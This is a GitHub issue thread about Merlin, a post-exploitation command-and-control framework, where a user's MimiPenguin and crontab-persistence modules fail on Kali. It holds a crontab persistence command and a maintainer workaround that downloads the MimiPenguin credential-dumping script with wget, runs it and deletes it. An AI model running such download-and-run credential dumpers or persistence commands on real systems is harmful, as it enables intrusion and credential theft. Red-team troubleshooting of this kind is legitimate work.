Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

MimiPenguin & BASH Path Error #114

Open
3 tasks done
P-T001 opened this issue Aug 9, 2021 · 4 comments
Open
3 tasks done

MimiPenguin & BASH Path Error #114

P-T001 opened this issue Aug 9, 2021 · 4 comments

Comments

@P-T001
Copy link

P-T001 commented Aug 9, 2021
edited

Hi There,
I looked for several post-c2 development frameworks. Finally, I thought Merlin was better and easy to install, but now I have a problem. I casually tested several modules and each time it was "not found" and "exit status code 127". But I can use the echoed command directly

error:
[-] Results job lkqFILVvZK for agent f8eb12ec-3fef-4f17-8763-c230x7a791aa at 2021-08-09T08:51:18Z

[+] /bin/sh: 1: (crontab -l 2>/dev/null; echo "* * * * * /bin/bash -c") | crontab - && echo crontab successfully modified.: not found

[!] exit status 127

Prerequisite

  • I have read the README
  • I have search the opened & closed issues
  • I have search the WIKI and its FAQ page

Environment Data

  • Merlin Version:
  • Merlin Build:
  • Go Version:go1.15.9 linux/amd64
  • GOPATH Environment Variable:
  • GOROOT Environment Variable:
  • Operating System: kali-linux-2020.2-amd64
@Ne0nd0g
Copy link
Owner

Ne0nd0g commented Aug 9, 2021

Can you please share the following information:

  • A list of module names that were not found
  • A list of module names that returned an error
  • The Merlin Server version and build
  • The Merlin Agent version, build, and operating system

@P-T001
Copy link
Author

P-T001 commented Aug 10, 2021
edited

以下信息:

  • A list of module names that were not found:
    I don't understand what you mean
  • A list of module names that returned an error:(I tested that both modules reported the above 127 errors)
    linux/x64/bash/credentials/MimiPenguin
    linux/x64/bash/persistence/CrontabPersistence
  • The Merlin Server version and build:
    Version: 1.1.0 system:kali-linux-2020.2-amd64 、go1.15.9 linux/amd64
    *The Merlin Agent version, build, and operating system:
    Version: 1.0.2 system:kali-linux-2020.2-amd64 、go1.15.9 linux/amd64

@Ne0nd0g
Copy link
Owner

Ne0nd0g commented Aug 10, 2021

You said:

I casually tested several modules and each time it was "not found"

What modules did you test that were "not found"?

The problem is that the module is for BASH but Kali uses Debian Almquist shell (dash). The symbolic link for /bin/sh on Kali points to /usr/bin/dash. The modules are causing an error because they are using /bin/bash which does not exist on Kali.

A temporary work around is to replace the commands list with:

    "commands": [
      "/bin/sh", "-c", "wget -O /tmp/mimipenguin.sh https://raw.githubusercontent.com/huntergregal/mimipenguin/beta-1.0/mimipenguin.sh;bash /tmp/mimipenguin.sh && rm /tmp/mimipenguin.sh"
    ]

I will work on fixing the code.

@P-T001
Copy link
Author

P-T001 commented Aug 11, 2021
edited

"Not found" refers to the error message in error code 127. It is not that the module cannot be found. I think it should be the problem you said: use "/bin/bash" that does not exist on Kali

@Ne0nd0g Ne0nd0g changed the title Module usage error code 127 MimiPenguin & BASH Path Error Nov 9, 2023
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@Ne0nd0g @P-T001